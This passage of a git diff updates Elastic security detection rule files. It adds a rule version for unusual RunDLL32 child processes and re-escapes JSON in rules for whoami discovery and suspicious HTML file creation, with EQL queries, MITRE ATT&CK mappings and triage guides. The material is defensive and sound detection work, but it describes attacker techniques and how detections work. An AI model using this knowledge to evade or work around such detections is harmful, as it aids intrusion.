Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", "related_integrations": [ { "package": "endpoint", @@ -78,7 +78,7 @@ ], "risk_score": 21, "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_108.json b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_108.json index 0296483b7e0..63801bf77f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_108.json +++ b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_108.json @@ -19,7 +19,7 @@ "license": "Elastic License v2", "name": "Whoami Process Activity", "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current privileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437\u003enul 2\u003e\u00261 \u0026 C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437\u003enul 2\u003e\u00261 \u0026 %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437>nul 2>&1 & C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437>nul 2>&1 & %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", "related_integrations": [ { "package": "endpoint", @@ -78,7 +78,7 @@ ], "risk_score": 21, "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_1.json b/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_1.json index c03c7fbb33c..6eee0fdae56 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_103.json b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_103.json index ed2c27d8324..179638e62b7 100644 --- a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_103.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_104.json b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_104.json index 8e37c1b3fcb..d292b279592 100644 --- a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_104.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_105.json b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_105.json index ac4aa35fca0..258c39e5fd9 100644 --- a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_105.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_106.json b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_106.json new file mode 100644 index 00000000000..4718373d16f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_106.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies child processes of unusual instances of RunDLL32 where the command line parameters were suspicious. Misuse of RunDLL32 could indicate malicious activity.", + "from": "now-60m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*" + ], + "interval": "30m", + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Processes of RunDLL32", + "note": "## Triage and analysis\n\n### Investigating Unusual Child Processes of RunDLL32\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nRunDLL32 is a legitimate Windows utility used to load and execute functions within dynamic-link libraries (DLLs). However, adversaries may abuse RunDLL32 to execute malicious code, bypassing security measures and evading detection. This rule identifies potential abuse by looking for an unusual process creation with no arguments followed by the creation of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the behavior of child processes, such as network connections, registry or file modifications, and any spawned processes.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related Rules\n\n- Unusual Network Connection via RunDLL32 - 52aaab7b-b51c-441a-89ce-4387b3aea886\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1h\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"rundll32.exe\" or process.pe.original_file_name == \"RUNDLL32.EXE\") and\n process.args_count == 1\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"rundll32.exe\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f036953a-4615-4707-a1ca-dc53bf69dcd5", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "f036953a-4615-4707-a1ca-dc53bf69dcd5_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_102.json b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_102.json index b70e70b1f4f..208923bb53f 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_102.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Suspicious HTML File Creation", "note": "", - "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy \u003e= 5 and file.size \u003e= 150000) or file.size \u003e= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", + "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", "related_integrations": [ { "package": "endpoint", @@ -73,7 +73,7 @@ ], "risk_score": 47, "rule_id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_103.json b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_103.json index a77843ecab8..0fb42e21f7a 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_103.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Suspicious HTML File Creation", "note": "", - "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy \u003e= 5 and file.size \u003e= 150000) or file.size \u003e= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", + "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", "related_integrations": [ { "package": "endpoint", @@ -73,7 +73,7 @@ ], "risk_score": 47, "rule_id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_104.json b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_104.json index 3e8ace04db7..4b5baf7b3c1 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_104.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Suspicious HTML File Creation", "note": "", - "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy \u003e= 5 and file.size \u003e= 150000) or file.size \u003e= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", + "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", "related_integrations": [ { "package": "endpoint", @@ -73,7 +73,7 @@ ], "risk_score": 47, "rule_id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -84,7 +84,7 